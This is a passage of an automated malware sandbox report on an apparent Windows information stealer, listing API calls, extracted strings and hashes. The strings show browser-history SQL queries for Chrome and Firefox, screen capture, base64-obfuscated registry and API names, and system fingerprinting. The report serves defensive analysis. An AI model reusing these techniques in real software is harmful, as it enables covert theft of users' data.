                      • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                      • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                      • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                      • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                    • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                    • API String ID: 75899496-943277980
                    • Opcode ID: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
                    • Instruction ID: 9ad36b54795493928cf4d7680a901020c7452f2e53798e9be21810986d7bb062
                    • Opcode Fuzzy Hash: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
                    • Instruction Fuzzy Hash: A2714E30A44109ABCF01FFD1CC42FCDBBBAAF48309F60407BB104B65D6D67DAA468A19
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
                    • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
                    • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
                    • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
                    • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34
                      • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc$FileModuleName
                    • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                    • API String ID: 2206896924-1825016774
                    • Opcode ID: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
                    • Instruction ID: 099c1664e0e1cd81917be229cd1a82c6e96495822271a1ae00088806601eb9d9
                    • Opcode Fuzzy Hash: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
                    • Instruction Fuzzy Hash: C2312BB1A443086EDB00EBB5CC42E9E7BBCAB48754F200576F504F72C1DA78AE058A68
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
                    • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
                    • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
                    • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
                    • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34
                      • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc$FileModuleName
                    • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                    • API String ID: 2206896924-1825016774
                    • Opcode ID: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
                    • Instruction ID: f930562a739e9fb19de45fac1d58899ce59ec74f5e2b45b4c14d1fb7312bbdc9
                    • Opcode Fuzzy Hash: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
                    • Instruction Fuzzy Hash: 28312EB1E443096EDB00EBB5CC42E9E7BFCAB48754F200576F514F72C1DA78AE058A58
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                    • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                    • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc$CurrentProcess
                    • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                    • API String ID: 3877065590-4127804628
                    • Opcode ID: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
                    • Instruction ID: b4fa090e97bfe7a1d5ce5cc441e323bfe92997b970e5e29befa82c83258fdf6c
                    • Opcode Fuzzy Hash: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
                    • Instruction Fuzzy Hash: B4918574A001099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                    • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                    • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc$CurrentProcess
                    • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                    • API String ID: 3877065590-4127804628
                    • Opcode ID: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
                    • Instruction ID: f3c24ddc2a443a78fd4165323e7ca93df30f075cb4f00a4e444516d0c24f858d
                    • Opcode Fuzzy Hash: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
                    • Instruction Fuzzy Hash: FB917570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                    • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                    • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc$CurrentProcess
                    • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                    • API String ID: 3877065590-4127804628
                    • Opcode ID: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
                    • Instruction ID: fd76d8ed353255a1278cd755ee3df483ef4fe920b1e5afc451e9d1c12470fbd9
                    • Opcode Fuzzy Hash: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
                    • Instruction Fuzzy Hash: B2818570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                    • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                    • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                      • Part of subcall function 00407500: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
                      • Part of subcall function 00407500: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582
                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: Open$EnumFreeString$QueryValue
                    • String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
                    • API String ID: 811798878-3013244427
                    • Opcode ID: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
                    • Instruction ID: 33798bc805095534a257e2f05040e6cfe59ff7211d39a9aa4329e2c1f04a858c
                    • Opcode Fuzzy Hash: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
                    • Instruction Fuzzy Hash: 34C124B1A001189BD710EB55CC81BCEB7BDAF44309F5145FBA608B7286DA38AF858F5D
                    APIs
                    • GetDC.USER32(00000000), ref: 00417994
                    • CreateCompatibleDC.GDI32(00000000), ref: 0041799D
                    • CreateCompatibleBitmap.GDI32(00000000,0041A69E,?), ref: 004179AD
                    • SelectObject.GDI32(00000000,00000000), ref: 004179B6
                    • BitBlt.GDI32(00000000,00000000,00000000,0041A69E,?,00000000,00000000,?,00CC0020), ref: 004179D6
                    • CreateStreamOnHGlobal.COMBASE(00000000,000000FF,00000000), ref: 004179E8
                    • GetHGlobalFromStream.COMBASE(?,?), ref: 00417A76
                    • GlobalLock.KERNEL32(?), ref: 00417A80
                    • GlobalUnlock.KERNEL32(?), ref: 00417AA2
                    • DeleteObject.GDI32(00000000), ref: 00417AA8
                    • DeleteDC.GDI32(00000000), ref: 00417AAE
                    • ReleaseDC.USER32(00000000,00000000), ref: 00417AB6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: Global$Create$CompatibleDeleteObjectStream$BitmapFromLockReleaseSelectUnlock
                    • String ID:
                    • API String ID: 734935659-0
                    • Opcode ID: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
                    • Instruction ID: 9ea5443061d6a736e16c7905b4946b830ee6406ef7c7b01cecb07d86951751fb
                    • Opcode Fuzzy Hash: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
                    • Instruction Fuzzy Hash: 9B513CB1944208AFDB10EFA5DC85BEF7BF8AB48305F24402AF614E62D1D7789985CB58
                    APIs
                    • GetTickCount.KERNEL32 ref: 004129E8
                    • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412CA8,?,.tmp,?,?,00000000,00412BE7,?,00000000,00412C71,?,00000000), ref: 00412A64
                    • DeleteFileW.KERNEL32(00000000), ref: 00412C05
                    Strings
                    • , xrefs: 00412B98
                    • SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412ACE
                    • .tmp, xrefs: 00412A03
                    • %TEMP%, xrefs: 00412A23
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CopyCountDeleteTick
                    • String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
                    • API String ID: 2381671008-351388873
                    • Opcode ID: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
                    • Instruction ID: 01415e14dcc46a11cfd4ad831b9185370b0be0c5393ee3a374a7f2b0250afb3b
                    • Opcode Fuzzy Hash: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
                    • Instruction Fuzzy Hash: 05810C31A00109AFDB00EF95DD82ADEBBB9EF48315F204436F514F7292DB78AE558B58
                    APIs
                    • GetTickCount.KERNEL32 ref: 004125B0
                    • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412870,?,.tmp,?,?,00000000,004127AF,?,00000000,00412839,?,00000000), ref: 0041262C
                    • DeleteFileW.KERNEL32(00000000), ref: 004127CD
                    Strings
                    • %TEMP%, xrefs: 004125EB
                    • .tmp, xrefs: 004125CB
                    • , xrefs: 00412760
                    • SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412696
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CopyCountDeleteTick
                    • String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
                    • API String ID: 2381671008-462058183
                    • Opcode ID: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
                    • Instruction ID: 880bf71673710542150f6ebe4433b3a02274b147136189202950d85bd83b2515
                    • Opcode Fuzzy Hash: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
                    • Instruction Fuzzy Hash: A9810C71A00109AFDB00EF95DD82ADEBBB9EF48314F504536F410F72A2DB78AE558B58
                    APIs
                    • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeString$InfoSystem
                    • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                    • API String ID: 4070941872-1038824218
                    • Opcode ID: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
                    • Instruction ID: 93658ecaa3e0ddcdd5b33a88495a7f5ee5c1cb8a97fdfd99440d65a07410f67b
                    • Opcode Fuzzy Hash: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
                    • Instruction Fuzzy Hash: DF411F70A1010DABDB01FFD1D882ACDBBB9EF48309F61403BF504B7296D639EA458A58
                    APIs
                    • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeString$InfoSystem
                    • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                    • API String ID: 4070941872-1038824218
                    • Opcode ID: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
                    • Instruction ID: 0500c902736339f4efa0b07d3f9bc907855da1606bbc95f65d7857d0c3659172
                    • Opcode Fuzzy Hash: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
                    • Instruction Fuzzy Hash: 27410F70A1010DABDB01FFD1D882EDDBBB9EF48709F61403BF504B7296D639EA458A58
                    APIs
                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
                    • GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033BC
                    • WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033C2
                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004033E0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileHandleWrite$Message
                    • String ID: Error$Runtime error at 00000000
                    • API String ID: 1570097196-2970929446
                    • Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                    • Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
                    • Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                    • Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D
                    APIs
                    • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 0040269F
                    • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026A9
                    • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026C6
                    • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026D0
                    • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026F9
                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402703
                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402727
                    • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402731
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: CharNext
                    • String ID:
                    • API String ID: 3213498283-0
                    • Opcode ID: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
                    • Instruction ID: 5b28f76bfa796ab2381ca360e83c3cb8d2614de50686c14b6561fe7fc9f0b368
                    • Opcode Fuzzy Hash: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
                    • Instruction Fuzzy Hash: B021E7546043951ADB31297A0AC877B6B894A5B304B68087BD0C1BB3D7D4FE4C8B832D
                    APIs
                    • GetTickCount.KERNEL32 ref: 00410EB4
                    • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                    • DeleteFileW.KERNEL32(00000000), ref: 004110EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CopyCountDeleteTick
                    • String ID: $%TEMP%$.tmp
                    • API String ID: 2381671008-2792595090
                    • Opcode ID: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
                    • Instruction ID: ef1d9ef4a41f0d536355ae74e23377fcfc6b42a5aa152db35adc264ec6821d93
                    • Opcode Fuzzy Hash: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
                    • Instruction Fuzzy Hash: 55910B31A40109AFDB00EB95DC82EDEBBB9EF48315F104436F514F72A2DB78AE458B58
                    APIs
                    • LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040B3C3,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F), ref: 0040B1A9
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1AF
                    • LoadLibraryA.KERNEL32(00000000,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F,?,00000000,0041B0FC,00000000), ref: 0040B204
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B22A
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B248
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B266
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID:
                    • API String ID: 2238633743-0
                    • Opcode ID: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
                    • Instruction ID: 364380f0d352aef1bf1129e1f4ec87a81fdd7fa01391a9152c5138518fa9ee90
                    • Opcode Fuzzy Hash: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
                    • Instruction Fuzzy Hash: 5761E375A002099BDB01EBE5C985E9EB7BDFF44304F50453AB900FB385DA78EE0587A8
                    APIs
                    • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
                    • LocalFree.KERNEL32(00000000,00000000,00401A0A), ref: 00401973
                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 00401992
                    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 004019D1
                    • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 004019FA
                    • RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 00401A04
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                    • String ID:
                    • API String ID: 3782394904-0
                    • Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
